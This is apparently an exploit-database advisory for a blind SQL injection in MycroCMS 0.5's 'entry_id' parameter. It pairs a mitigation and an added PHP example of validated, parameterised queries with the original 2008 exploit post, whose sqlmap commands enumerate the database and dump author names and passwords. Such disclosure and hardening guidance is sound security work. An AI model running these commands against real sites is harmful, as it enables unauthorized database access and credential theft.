Vendor: MycroCMS
By: CWH Underground
CVSS: 8.8 HIGH
Remote Blind SQL Injection
CWE: 89
Product Name: MycroCMS
Affected Version From: 0.5
Affected Version To: 0.5
Patch Exists: NO
Related CWE: N/A
CPE: a:mycrocms:mycrocms:0.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

MycroCMS 0.5 Remote Blind SQL Injection Vulnerability

MycroCMS 0.5 is vulnerable to remote blind SQL injection. The 'entry_id' parameter is used in an SQL query without sufficient sanitization of user-supplied input, so an attacker can send a malicious SQL query through it to gain access to the database and extract sensitive information. The exploit requires 'magic_quotes_gpc' to be disabled.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
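
One way to apply this mitigation to the 'entry_id' parameter, shown as an added example that is not MycroCMS code and not part of the original advisory. The table `entries`, its columns, the function names and the in-memory SQLite database (requires pdo_sqlite) are assumptions made so the example runs offline.

```php
<?php
// Added example: hypothetical entry lookup, not MycroCMS source code.
// Assumed names: table `entries`, columns id/title/body, both function names.

// Weak pattern (assumed shape of the flaw described above):
//   $db->query('SELECT ... FROM entries WHERE id = ' . $_GET['entry_id']);
// In a numeric context no quote is needed, so quote escaping alone
// (magic_quotes_gpc or similar) is not a fix; validate and bind instead.

// Constructed in-memory database so the example runs without a server.
function demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE entries (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
    $db->exec("INSERT INTO entries VALUES (3, 'Hello', 'First post')");
    return $db;
}

// Hardened lookup: strict integer validation, then a bound parameter.
// Returns the row, or null when the input is invalid or no entry matches.
function find_entry(PDO $db, $entryId): ?array {
    $id = filter_var($entryId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // anything that is not a positive integer is rejected
    }
    // The SQL text is constant; the value travels separately as a typed parameter.
    $stmt = $db->prepare('SELECT id, title, body FROM entries WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = demo_db();
// Constructed inputs: one valid id, several malformed values, one unknown id.
foreach (['3', '3 AND 1=1', "3'", '', '-1', '99'] as $input) {
    $row = find_entry($db, $input);
    printf("%-14s => %s\n", var_export($input, true),
        $row ? $row['title'] : 'rejected or not found');
}
```

Only the input '3' returns a row; every malformed value is rejected before any SQL is executed.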
Source

Exploit-DB raw data:

=======================================================
 MycroCMS 0.5 Remote Blind SQL Injection Vulnerability 
=======================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 11 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : MycroCMS
 VERSION     : 0.5 (Latest Version)
 DOWNLOAD    : http://downloads.sourceforge.net/mycrocms
#####################################################

---Remote Blind SQL Injection---

***magic_quotes_gpc = off***

-----------------
 Vulnerable Path
-----------------

[+] http://[Target]/[mycrocms_path]/mycrocms/?entry_id=[Blind SQL]


---------------------------------
 Blind SQL Injection with SqlMap
---------------------------------

[+] Find DB name
POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" --current-db -u http://localhost/mycrocms/?entry_id=3

[+] Enumerate All Tables (Use Database "mycrocms")
POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" --tables -u http://localhost/mycrocms/?entry_id=3

[+] Enumerate All Columns in Table (Use Table "mbauthor")
POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" -T "mbauthor" --columns -u http://localhost/mycrocms/?entry_id=3

[+] Dump All Data in Column (Use Column "author_name" and "author_pw")
POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" -T "mbauthor" -C author_name,author_pw --dump -u http://localhost/mycrocms/?entry_id=3


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-11]